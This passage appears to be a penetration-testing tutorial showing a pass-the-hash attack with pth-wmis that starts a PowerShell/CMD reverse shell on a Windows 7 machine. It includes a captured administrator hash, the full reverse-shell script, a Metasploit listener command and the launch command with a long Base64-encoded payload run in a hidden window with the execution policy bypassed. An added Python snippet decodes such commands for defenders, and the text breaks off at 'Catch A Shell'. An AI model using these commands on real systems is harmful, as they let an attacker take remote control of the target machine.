pth-wmis and Combined PowerShell and CMD Reverse Shell


Useful Background:

http://passing-the-hash.blogspot.ca/2013/04/missing-pth-tools-writeup-wmic-wmis-curl.html
http://passing-the-hash.blogspot.ca/2013/07/WMIS-PowerSploit-Shells.html

Resource:

Combined PowerShell and CMD Reverse Shell

Purpose:

Test the use of the "Combined PowerShell and CMD Reverse Shell" together with the Pass-The-Hash version of wmis (pth-wmis).

Disclaimer:

These scripts are provided for educational purposes only and for use by Ethical Hackers. Use only on systems for which you have acquired all the legally required contracts and permissions for use. It is your responsibility to determine whether you are legally permitted to use these scripts in your country and for your purposes. No warranty or guarantee is provided.


Attacking Box:

32bit Offsec VM - Kali

Target Box:

Windows 7 Professional Service Pack 1

We Have A Hash

From another compromised box on the same network we have captured the local Administrator's hash:

Administrator:500:NO PASSWORD*********************:DC4BD458EDB0D834A5775F69453F2216:::

Rather than spend excessive time cracking it, we are going to use a Pass-The-Hash attack.

Replace the NO PASSWORD**... text with a blank LM Hash:
aad3b435b51404eeaad3b435b51404ee:DC4BD458EDB0D834A5775F69453F2216

Grab The PowerShell Component:

The first thing that we need to do is to grab the PowerShell component from the "Combined PowerShell and CMD Reverse Shell":
$ps=$false;$hostip=(gci -path env:HOSTIP).value;$port=(gci -path env:EXP1).value;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Base64 Encode It: 

The PowerShell needs to be Unicode (UTF-16LE) encoded first and then Base64 encoded, because that is the form the -enc parameter expects. Personally I like to put what I need encoded into a command.txt file and then use PowerShell to encode it:

$fileName = "command.txt"
$fileContent = get-content $fileName
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText | set-content ($fileName + ".b64")
The result is in a file called command.txt.b64.

Set Up A Listener:

export HOSTIP=10.0.0.22;
export EXP1=5379;
msfconsole -q -x "setg LHOST $HOSTIP;use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/x64/shell_reverse_tcp;set EXITFUNC thread;set LPORT $EXP1;exploit -j;";

Run pth-wmis: 

pth-wmis -U "demo/administrator"%"aad3b435b51404eeaad3b435b51404ee:DC4BD458EDB0D834A5775F69453F2216" //10.0.0.20 'cmd.exe /c "set HOSTIP=10.0.0.22 && set EXP1=5379 && powershell -NoP -nol -NonI -W Hidden -Exec Bypass -enc JABwAHMAPQAkAGYAYQBsAHMAZQA7ACQAaABvAHMAdABpAHAAPQAoAGcAYwBpACAALQBwAGEAdABoACAAZQBuAHYAOgBIAE8AUwBUAEkAUAApAC4AdgBhAGwAdQBlADsAJABwAG8AcgB0AD0AKABnAGMAaQAgAC0AcABhAHQAaAAgAGUAbgB2ADoARQBYAFAAMQApAC4AdgBhAGwAdQBlADsAJABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQAaABvAHMAdABpAHAALAAkAHAAbwByAHQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA1ADAAMAAwADAAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAYwBtAGQAPQAoAGcAZQB0AC0AYwBoAGkAbABkAGkAdABlAG0AIABFAG4AdgA6AEMAbwBtAFMAcABlAGMAKQAuAHYAYQBsAHUAZQA7ACQAaQBuAEEAcgByAGEAeQA9ACQAZABhAHQAYQAuAHMAcABsAGkAdAAoACkAOwAkAGkAdABlAG0APQAkAGkAbgBBAHIAcgBhAHkAWwAwAF0AOwBpAGYAKAAoACQAaQB0AGUAbQAgAC0AZQBxACAAJwAkAHAAcwAnACkAIAAtAGEAbgBkACAAKAAkAHAAcwAgAC0AZQBxACAAJABmAGEAbABzAGUAKQApAHsAJABwAHMAPQAkAHQAcgB1AGUAfQBpAGYAKAAkAGkAdABlAG0AIAAtAGwAaQBrAGUAIAAnAD8AOgAnACkAewAkAGkAdABlAG0APQAnAGQAOgAnAH0AJABtAHkAQQByAHIAYQB5AD0AQAAoACcAYwBkACcALAAnAGUAeABpAHQAJwAsACcAZAA6ACcALAAnAHAAdwBkACcALAAnAGwAcwAnACwAJwBwAHMAJwAsACcAcgBtACcALAAnAGMAcAAnACwAJwBtAHYAJwAsACcAYwBhAHQAJwApADsAJABkAG8APQAkAGYAYQBsAHMAZQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQAgAGkAbgAgACQAbQB5AEEAcgByAGEAeQApAHsAaQBmACgAJABpAHQAZQBtACAALQBlAHEAIAAkAGkAKQB7ACQAZABvAD0AJAB0AHIAdQBlAH0AfQBpAGYAKAAkAGQAbwAgAC0AbwByACAAJABwAHMAKQB7ACQAcwBlAG4AZABiAGEAYw
BrAD0AKAAgAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AZQBsAHMAZQB7ACQAZABhAHQAYQAyAD0AJwAvAGMAIAAnACsAJABkAGEAdABhADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKAAgACYAJABjAG0AZAAgACQAZABhAHQAYQAyACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACkAfQA7AGkAZgAoACQAcABzACkAewAkAHAAcgBvAG0AcAB0AD0AJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAfQBlAGwAcwBlAHsAJABwAHIAbwBtAHAAdAA9ACgAcAB3AGQAKQAuAFAAYQB0AGgAfQAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAZABhAHQAYQAgACsAIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAkAHAAcgBvAG0AcAB0ACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"'
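
From the defender's side, the command line above is what the target records when process command-line logging is enabled. The following added example (not part of the original post) pulls the -enc argument out of such a command line, reverses the Unicode-then-Base64 encoding, and flags the launch switches and script strings used here; the function names, finding labels and sample values are assumptions made for illustration.

```python
import base64
import re

# "-name value" pairs whose value looks like Base64 (16+ characters).
ARG = re.compile(r"""\s[-/]([A-Za-z]+)\s+["']?([A-Za-z0-9+/]{16,}={0,2})""")
LAUNCH_FLAGS = {  # launch switches seen in the page's command line
    "hidden_window": r"\s-w\w*\s+hidden",
    "exec_bypass": r"\s-e[xp]\w*\s+bypass",
}
SCRIPT_INDICATORS = {  # strings taken from the page's PowerShell component
    "tcp_client": r"System\.Net\.Sockets\.TCPClient",
    "dynamic_eval": r"\b(?:iex|Invoke-Expression)\b",
    "stream_io": r"\.GetStream\(\)",
}

def encoded_argument(cmdline):
    """Return the Base64 value passed as -EncodedCommand (-e, -enc, -ec, ...), or None."""
    for name, value in ARG.findall(cmdline):
        if name.lower() == "ec" or "encodedcommand".startswith(name.lower()):
            return value
    return None

def decode_encoded_command(b64):
    """Reverse the page's encoding: Base64 -> UTF-16LE bytes -> script text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")

def triage(cmdline):
    """Return (findings, decoded_script) for one process command line."""
    findings = [n for n, p in LAUNCH_FLAGS.items() if re.search(p, cmdline, re.I)]
    script, b64 = None, encoded_argument(cmdline)
    if b64:
        try:
            script = decode_encoded_command(b64)
        except ValueError:  # malformed Base64 or bytes that are not UTF-16LE
            findings.append("undecodable_encoded_command")
        else:
            findings.append("encoded_command")
            findings += [n for n, p in SCRIPT_INDICATORS.items() if re.search(p, script, re.I)]
    return findings, script

# Constructed sample, not a captured log: one fragment of the page's script on a
# command line shaped like the page's. 192.0.2.10 is a documentation address.
SAMPLE_SCRIPT = "$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream()"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = ('cmd.exe /c "set HOSTIP=192.0.2.10 && set EXP1=4444 && powershell '
                  '-NoP -nol -NonI -W Hidden -Exec Bypass -enc ' + SAMPLE_B64 + '"')

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

The decoded script text, rather than the Base64 itself, is what the indicator patterns are matched against, so the same check works whichever abbreviation of -EncodedCommand was typed.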

Catch A Shell:


